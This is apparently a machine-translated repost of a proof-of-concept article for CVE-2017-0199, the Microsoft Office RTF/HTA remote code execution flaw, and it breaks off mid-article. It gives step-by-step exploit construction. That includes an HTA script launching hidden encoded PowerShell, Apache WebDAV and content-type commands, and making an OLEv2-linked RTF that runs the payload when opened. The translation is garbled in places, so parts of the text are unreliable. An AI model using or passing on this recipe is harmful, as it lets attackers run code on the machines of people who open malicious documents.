CVE-2017-0199: Microsoft Office RTF vulnerability using the PoC-vulnerability warning-the black bar safety net

2017-04-1700:00:00

佚名

www.myhack58.com

2534

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.974 High

EPSS

Percentile

99.9%

JSON

0x01 description
From FireFye detect and publish CVE-2017-0199 since, I have been researching this vulnerability in Microsoft officially released the patch, I decided to release this PoC. I use way possible with other researchers using different methods, the use of the method may be little bit easier.
CVE-2017-0199: when the user opens that contains the embedded vulnerabilities of the document, the winword. exe to the remote server to issue the HTTP request to retrieve a malicious HTA file, the server returns a file with an embedded malicious script fake RTF file, winword. exe through COM objects to find the application/hta file processing program, which causes a Microsoft HTA application mshta.exe load and execute a malicious script.
0x02 technology background
We can OLEv2 link included in the existing document. These objects will reflect the load to the document in the source links in the current content.
Surprisingly, if you try to HTA link contains for OLEv2 object, then it will be executed once when it is created, but Winword will return an error such as:
! [](/Article/UploadPic/2017-4/2017417184757772. png? www. myhack58. com)
In this case the issue is the HTA file will not be persisted if you link to a file+create the icon, then it may be possible to do persistence, but we want it hidden and automatically running.
I started by thinking about how to deal with not a malicious OLE object linked to a remote RTF file…in order to achieve the“proper”Microsoft Office in the expected way, I’m a little bit modifications in Apache in services I document the type of content and the DAV module…which will be in the next Chapter.
From there, I will have a valid embedded object is linked in automatically each time after the update to open my document!
The next step in the HTA with my payload to modify the sources of the documentation!
In this case, I can:
As a real RTF file to create a dynamic OLEv2 object link
Using my payloads to modify the source of the RTF
If you want to create a direct link to the HTA document, please bypass the errors arising from the
0x03 technical details
Step 1
Prepare a HTA file to: the HTA file is you can run JScript and VBscript HTML applications
We create a“ms. hta”file:

Bonjour

Set owFrClN0giJ = CreateObject(“Wscript. Shell”)
Set v1ymUkaljYF = CreateObject(“Scripting. FileSystemObject”)
If v1ymUkaljYF. FileExists(owFrClN0giJ. ExpandEnvironmentStrings(“%PSModulePath%”) + “…\powershell.exe”) Then
owFrClN0giJ. Run “powershell.exe -nop-w hidden-e ENCODED_B64_SHELL”
End If

id=“oHTA”
applicationname=“Bonjour”
application=“yes”
>

Step 2
Use any random content in Winword to create a simple RTF document. In the example, I use string as My Content
Named“ms. rtf to.”
Step 3
Will this 2 files to send to us the full control of the network server. We assume that it will be stored in/var/www/html.
Now we must configure Apache to ms. rtf as a link. Configure Apache to:
a2enmod dav
a2enmod dav_fs
a2enmod dav_lock
a2enmod headers
service apache2 restart
The following command will:
The“Content-Type: application/rtf”Add to/ms in all the files in the
Allow Microsoft Office to perform the PROPFIND request
Modify virtualhost and include:

Header set Content-Type to “application/rtf”

Dav on

service apache2 restart
Step 4
Using Winword“ exploit. rtf ” to create a simple RTF document, which will be our exploit it!
Insert – >object
! [](/Article/UploadPic/2017-4/2017417184757698. png? www. myhack58. com)
CVE-2017-0199 create OLEv2 external links
After clicking OK, we will get only contains a random string the content of“ms. rtf”file. Save the file as“ exploit. rtf to. ”
! [](/Article/UploadPic/2017-4/2017417184757668. png? www. myhack58. com)
CVE-2017-0199 create Olev2 link object
In this step we can close the Winword and go to the next step of changing the ms. rtf content with the HTA payload…
Step 5
The following steps will:
Change the custom HTA payload contained in the ms. rtf
Web serverto send the“application/hta”content type…this will be the Winword client to resolve, and it will run Rwanda to handle this content type and execute our payload
cat /var/www/html/ms/ms. hta - > /var/www/html/ms. rtf
vi /etc/apache2/sites-enables/000-default
Change -> application/rtf to application/hta
like:

Header set Content-Type to “application/hta”
service apache2 restart
Step 6
In this step, if the user opens the“exploit. rtf”file, he has to double-click a linked object to launch the attack…

[1] [2] next